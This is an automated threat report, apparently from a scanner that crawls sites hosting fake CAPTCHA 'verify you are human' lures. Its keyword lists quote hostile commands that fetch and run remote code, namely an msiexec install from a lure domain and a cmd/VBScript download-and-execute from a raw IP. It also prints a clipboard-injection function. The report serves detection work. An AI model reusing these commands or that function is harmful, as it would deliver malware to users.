
Emerging ClickGrab Campaign: Advanced Analysis of 2026-06-21 Attack Patterns

100 sites analyzed | 13% detection rate | 3 PowerShell downloads

ClickGrab Threat Analysis Report - 2026-06-21

Generated on 2026-06-21 01:53:22

Executive Summary

  • Total sites analyzed: 100
  • Sites with malicious content: 13
  • Unique domains encountered: 944
  • Total URLs extracted: 6,489
  • PowerShell download attempts: 3
  • Clipboard manipulation instances: 45

Domain Analysis

Most Frequently Encountered Domains

  • bharatnamkeens.com: 374 occurrences
  • baovechuyennghiep.baovengayvadem.com: 348 occurrences
  • www.maheshwaree.com: 316 occurrences
  • 98.70.13.131: 303 occurrences
  • fudgeshop.com.au: 265 occurrences
  • picsera.com: 227 occurrences
  • 18.176.47.246: 218 occurrences
  • www.ccera-icar.org: 178 occurrences
  • senevie.com: 165 occurrences
  • www.evodigital.com.au: 156 occurrences
  • www.creatorssky.com: 154 occurrences
  • setenews.com: 150 occurrences
  • devblog.ezeelogin.com: 126 occurrences
  • picsera.sirv.com: 125 occurrences
  • www.dorper.com.au: 125 occurrences

URL Pattern Analysis

reCAPTCHA imagery

16 occurrences across 12 distinct URLs

  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (3 times)
  • https://www.google.com/recaptcha/api.js (2 times)
  • https://2captcha.com/dist/web/assets/google-privacy-policy-Cb0CGVRT.svg (2 times)
  • http://172.96.189.153/wp-content/plugins/cf-security-shield/assets/css/captcha-styles.css?ver=1.0.0 (1 time)
  • http://172.96.189.153/wp-content/plugins/ckk/assets/css/captcha-styles.css?ver=2.0.0 (1 time)
  • ...and 7 more distinct URLs

Font resources

77 occurrences across 59 distinct URLs

  • https://fonts.gstatic.com (6 times)
  • http://casa-ananda.cl/wp-content/uploads/et-fonts/Montserrat-Bold.ttf (4 times)
  • http://casa-ananda.cl/wp-content/uploads/et-fonts/Montserrat-Regular.ttf (4 times)
  • https://use.fontawesome.com/releases/v5.0.0/css/all.css (3 times)
  • https://fonts.googleapis.com (3 times)
  • ...and 54 more distinct URLs

CDN hosted scripts

11 occurrences across 11 distinct URLs

  • https://cdn.jsdelivr.net/npm/three@0.167.0/build/three.module.js (1 time)
  • https://cdn.jsdelivr.net/npm/three@0.167.0/examples/jsm/ (1 time)
  • https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 (1 time)
  • https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.css?ver=6.8.5 (1 time)
  • https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.min.js?ver=6.0.8 (1 time)
  • ...and 6 more distinct URLs

Google resources

92 occurrences across 58 distinct URLs

  • https://bharatnamkeens.com/wp-content/plugins/widget-google-reviews/assets/img/guest.png (18 times)
  • https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent (4 times)
  • https://www.googletagmanager.com/gtm.js?id= (4 times)
  • https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png (3 times)
  • https://www.google (3 times)
  • ...and 53 more distinct URLs

Suspicious Keyword Analysis

Total Keywords Found: 381 (103 unique)

Keyword Categories

Social Engineering

53 unique keywords

  • Command line: [2]Removing applicationsRemoving filesRemoving foldersFile: [1], Section: [2], Key: [3], Value: [4]Removing INI file entriesRemoving ODBC componentsRemoving system registry valuesKey: [1], Name: [2]Removing shortcutsFile: [1], Folder: [2]Registering modulesRemoving backup filesRollbackRemoving moved filesRollbackCleanupInitializing ODBC directoriesStarting servicesStopping servicesUnpublishing Qualified ComponentsUnpublishing product informationThe wizard was interrupted before [ProductName] could be completely installed.UnmoveFilesUnpublishing product featuresUnregister class serversCreating IIS Virtual Roots...UnpublishProductAppId: [1]{{, AppType: [2]}}Unregistering COM+ Applications and ComponentsUnregistering extension serversUnregistering fontsUnregistering MIME infoUnregistering program identifiersUnregistering type librariesWriting INI file valuesKey: [1], Name: [2], Value: [3]Writing system registry valuesAdvertising applicationRemoving IIS Virtual Roots...caCreateVRoots{&TahomaBold10}Welcome to the InstallShield Wizard for [ProductName]caRemoveVRoots1ISCHECKFORPRODUCTUPDATESAllUsersApplicationUsersNoAgreeToLicenseChange_IsMaintenanceCloseRestartRestartManagerOptionTypicalSetupType_IsSetupTypeMinDisplay_IsBitmapDlg{3B59CBE2-36D2-452F-B123-685CEEEB7456}[1]ALLUSERSARPPRODUCTICON.exeARPPRODUCTICON30DWUSINTERVALCE8B87EF8EFC67DF99ACF778AEBB978FDEEB808FFEAB07BFCEBC872FEE9BD088CECCA08FC9ACDWUSLINKTahoma8DefaultUIFontInstallShield for Windows InstallerDialogCaptionMinimalDisplayNameCustomThe InstallShield(R) Wizard will create a server image of [ProductName] at a specified network location. To continue, click Next.DisplayNameMinimalCosting COM+ application: [1]DisplayNameTypicalSetupErrorErrorDialog100INSTALLLEVEL0ISVROOT_PORT_NOInstalling COM+ application: [1]IS_COMPLUS_PROGRESSTEXT_COSTUninstalling COM+ application: [1]IS_COMPLUS_PROGRESSTEXT_INSTALLA newer version of this application is already installed on this computer. 
If you wish to install this version, please uninstall the newer version first. Click OK to exit the wizard.IS_COMPLUS_PROGRESSTEXT_UNINSTALLReplacing %s with %s in %s...IS_PREVENT_DOWNGRADE_EXITCosting XML files...IS_PROGMSG_TEXTFILECHANGS_REPLACECreating XML file %s...IS_PROGMSG_XML_COSTINGPerforming XML file changes...IS_PROGMSG_XML_CREATE_FILERemoving XML file %s...IS_PROGMSG_XML_FILESRolling back XML file changes...IS_PROGMSG_XML_REMOVE_FILEUpdating XML file %s...IS_PROGMSG_XML_ROLLBACK_FILESYour Company NameIS_PROGMSG_XML_UPDATE_FILEIS_SQLSERVER_AUTHENTICATIONsaIS_SQLSERVER_USERNAMEARInstallChoiceCreating application pool %sManufacturer12345<###-%%%%%%%>@@@@@PIDTemplateCreating application Pools...PROGMSG_IIS_CREATEAPPPOOLCreating IIS virtual directory %sPROGMSG_IIS_CREATEAPPPOOLSCreating IIS virtual directories...PROGMSG_IIS_CREATEVROOTCreating web service extensionPROGMSG_IIS_CREATEVROOTSCreating web service extensions...PROGMSG_IIS_CREATEWEBSERVICEEXTENSIONCreating IIS website %sPROGMSG_IIS_CREATEWEBSERVICEEXTENSIONSCreating IIS websites...PROGMSG_IIS_CREATEWEBSITEExtracting information for IIS virtual directories...PROGMSG_IIS_CREATEWEBSITESExtracted information for IIS virtual directories...PROGMSG_IIS_EXTRACTRemoving application po !"$0/& 2  &,!  2 & 
  • CaptchaLoading
  • command =msiexec /i https://i-like-ele-phants-verification.live/iamchallenge/verification/UserID7383526;
  • captcha-verified
  • robot
  • Checking if you are human
  • captcha_word
  • CaptchaCheckbox
  • captcha_site_key
  • captcha_link_
  • ...and 43 more

Obfuscation Indicators

5 unique keywords

  • eval('var timeOut'+popupItems[i].id)
  • eval("clearTimeout(timeIn"+uid+")")
  • eval("clearTimeout(timeOut"+uid+")")
  • eval("timeOut"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').hide(15); }, 200);")
  • eval("timeIn"+uid+" = setTimeout(function(){ li.find('> .catalog-section-childs').show(15).css({'top': top + 'px', 'left': left + 'px'}); }, 200);")

System Commands

24 unique keywords

  • cmd
  • Command ⌘</kbd>+<kbd>V</kbd>) the command into Terminal and press <kbd>Return</kbd>.</li>
  • Command =windows_command;
  • exec(
  • powershell
  • cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.1"):h.Open "GET","http://198.13.158.127:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
  • POWerShEll
  • command into the terminal and press <kbd>Enter</kbd>.</li>
  • Invoke-WebRequest
  • exec(ua) != null){rv = parseFloat(RegExp.$1);}}else if (n.appName == "Netscape"){rv = 11;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != null){rv = parseFloat(RegExp.$1);}}}return rv;}})(window, document, navigator)
  • ...and 14 more

Verification Text

2 unique keywords

  • Hidden
  • hidden

Technical Terms

19 unique keywords

  • .ps1
  • bypass
  • Bypass
  • WinHttpRequest
  • VirtualAlloc
  • XMLHTTP
  • press Enter
  • Ray ID
  • iex
  • You will observe
  • ...and 9 more

Most Frequent Keywords

  • hidden: 38 occurrences
  • robot: 36 occurrences
  • Robot: 26 occurrences
  • failed_to_retrieve: 24 occurrences
  • captcha: 18 occurrences
  • CAPTCHA: 11 occurrences
  • verification: 10 occurrences
  • I am not a robot: 9 occurrences
  • Verification: 9 occurrences
  • CAPTCHA Verification: 8 occurrences
  • You will observe: 8 occurrences
  • verification-id: 8 occurrences
  • To better prove you are not a robot: 8 occurrences
  • Captcha: 7 occurrences
  • Verification ID: 7 occurrences

Similar Keyword Patterns

Groups of keywords that appear to be variations of the same theme:

Group 1: captcha-styles, captcha-styles-css, captcha-loader, CaptchaListeners, captcha-js, captchaSiteKey

Group 2: Captcha, CaptchaImages, captcha-modal, captcha, captcha_page, CAPTCHA, captcha-badge, captcha-logo, CAPTCHA-logo, captcha-box, captcha_word, captcha_sid, captcha_0, captcha_link_, CaptchaError

Group 3: captcha-overlay, captcha-verified

Group 4: captcha-container, captcha-loader-js, CaptchaLoading

Group 5: robot, Robot

JavaScript Obfuscation Analysis

Obfuscation Sophistication Score: 0/7

Potential Base64 Encoded Content

Strings flagged by the Base64 heuristic; they may contain encoded malicious payloads:

  • CREATEWEBSITESExtracted
  • CREATEAPPPOOLCreating
  • exeARPPRODUCTICON30DWUSINTERVALCE8B87EF8EFC67DF99A...
  • DisplayNameTypicalSetupErrorErrorDialog100INSTALLL...
  • ALLUSERSARPPRODUCTICON

Clipboard Manipulation Analysis

Detected clipboard manipulation in 45 instances.

document.execCommand("copy")

Found in 19 snippets (42.2% of clipboard code)

Examples:

document.execCommand("copy")
document.execCommand('copy')
...try { const successful = document.execCommand('copy')

Textarea Manipulation

Found in 19 snippets (42.2% of clipboard code)

Examples:

ipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"
tListener("click", function () { const textarea = document.createElement('textarea'

Complete Malicious Functions

Function 1:

function setClipboardCopyData(textToCopy) {
    // Create an off-screen textarea holding the attacker-chosen text
    const tempTextArea = document.createElement("textarea");
    tempTextArea.value = textToCopy;
    document.body.append(tempTextArea);
    // Select it and copy its contents into the victim's clipboard
    tempTextArea.select();
    document.execCommand("copy");
    // Remove the element so nothing visible remains on the page
    document.body.removeChild(tempTextArea);
}

Report truncated for storage. Full per-site detail is available in the scan JSON under nightly_reports/.